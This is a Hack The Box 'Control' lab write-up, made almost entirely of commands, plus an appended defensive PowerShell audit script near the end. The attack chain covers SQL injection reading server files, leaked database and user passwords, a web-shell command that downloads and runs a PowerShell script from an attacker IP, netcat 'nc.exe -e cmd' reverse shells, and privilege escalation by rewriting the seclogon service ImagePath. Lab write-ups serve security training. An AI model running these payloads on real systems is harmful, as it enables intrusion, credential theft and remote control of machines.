Control


HTB Windows

nmap -A -p- -oA output 10.129.1.248 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA active 10.129.1.248

nmap -sU -O -p- -oA active-udp 10.129.1.248

nikto -h 10.129.1.248:80

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.248/FUZZ

whatweb 10.129.1.248

http://10.129.1.248

http://10.129.1.248/admin

Proxy->Options->Miscellaneous: select "Don't send items to Proxy history or live tasks"

Target->Scope->Include in scope: click Add and add http://10.129.1.248

Proxy->Options->Match and Replace: click Add and enter X-Forwarded-For:192.168.4.28 in Replace

productName=p' UNION SELECT TO_BASE64(LOAD_FILE('C:\inetpub\wwwroot\admin.php')),2,3,4,5,6-- -

Copy the result, paste it between the "" in the command below and decode it into a PHP file:

echo -n "" | base64 -d > admin.php

Do the same for database.php

And we see the MariaDB credentials

DB name: warehouse, DB user: manager, password: l3tm3!n

Clone the repository and modify the last line of the Invoke-ConPtyShell.ps1 script so that it opens a reverse shell to the attacking machine.

git clone https://github.com/antonioCoco/ConPtyShell

cd ConPtyShell

vim Invoke-ConPtyShell.ps1

http://10.129.1.248/uploads/revshell.php?cmd=powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.125/Invoke-ConPtyShell.ps1')

python3 -m http.server 80

We start the reverse shell.

cd C:\Windows\Temp\privesc

locate nc.exe

python3 -m http.server 80

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support -username cu3rv0x -password password123

net use x: \\10.10.14.105\smbFolder /user:cu3rv0x password123

copy x:\nc.exe nc.exe

cp nc.exe C:\Windows\System32\spool\drivers\color\nc.exe

$user = 'fidelity\hector'

$password = 'l33th4x0rhector'

$secpw = ConvertTo-SecureString $password -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential $user,$secpw

Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock {C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443}

whoami /priv

cp WinPEASany.exe ConPtyShell

cd ConPtyShell

python3 -m http.server 80

net use y: \\10.10.14.105\smbFolder /user:cu3rv0x password123

copy y:\winPEASany.exe winpeas.exe

We see that one of the stopped services is seclogon

sc query seclogon

reg query "HKLM\system\currentcontrolset\services\seclogon"

reg add "HKLM\system\currentcontrolset\services\seclogon" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443" /f

nc -lvnp 443
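The seclogon step only works because the service's registry key accepts writes from a low-privileged account. As an added audit check (not part of the original writeup), the PowerShell below lists every service key whose ACL grants write-type rights to a principal outside an allow-list, so an administrator can find and remove such entries; the allow-list and the rights mask are assumptions to adjust per environment.

```powershell
# Added audit script (not from the original writeup). Lists service registry
# keys whose ACL grants write-type rights to principals outside an allow-list,
# which is the condition the seclogon ImagePath change above depends on.
# Assumptions: run as an administrator; $Trusted is a constructed allow-list
# that should be adjusted to the environment.
function Find-WritableServiceKey {
    param(
        [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                               'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
    )
    # Any of these rights lets the holder change ImagePath or the ACL itself.
    $writeRights = [System.Security.AccessControl.RegistryRights]'SetValue, WriteKey, ChangePermissions, TakeOwnership, FullControl'

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            # Keys we cannot read the ACL of are skipped rather than aborting the scan.
            try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($Trusted -contains $ace.IdentityReference.Value) { continue }
                if (($ace.RegistryRights -band $writeRights) -eq 0) { continue }
                [PSCustomObject]@{
                    Service   = $key.PSChildName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                }
            }
        }
}

# Example run: show every flagged service, then the seclogon key specifically.
$findings = Find-WritableServiceKey
$findings | Format-Table -AutoSize
$findings | Where-Object Service -eq 'seclogon'
```

Each finding should be fixed by removing the offending ACE (or tightening it to read-only) on that service key, and a Sysmon registry-set rule on `Services\*\ImagePath` catches later changes.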

© 2025 Cu3rv0x